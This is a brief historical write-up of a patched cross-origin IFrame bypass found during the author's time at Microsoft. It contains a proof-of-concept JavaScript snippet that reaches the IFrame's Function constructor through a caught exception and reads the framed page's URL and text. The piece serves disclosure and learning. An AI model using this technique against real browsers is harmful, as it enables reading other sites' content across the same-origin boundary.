Deliberately causing an error inside a cross-origin IFrame and catching the exception gave access to the exception object’s constructor chain, which led to the Function constructor of the IFrame’s script engine. Code created through that constructor executed in the IFrame’s security context.
try {
    window[0].postMessage(); // Generates "Argument not optional" inside the IFrame
} catch (xException) {
    // xException was created by the IFrame's script engine, so its constructor
    // chain (Error -> Function) belongs to the IFrame's realm, not the parent's.
    var xFunction = xException.constructor.constructor;
    // Code built with that Function constructor runs against the IFrame's document.
    xFunction("alert(document.URL + '\\n\\n' + document.body.innerText)")();
}
Calling postMessage() without arguments was the most reliable way to force an error inside the IFrame from outside it. The thrown exception crossed the security boundary into the parent’s catch block. The exception object’s .constructor was Error, and Error.constructor was Function — but the Function that ran in the IFrame’s script context, not the parent’s. Calling that constructor created code with access to the IFrame’s document.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.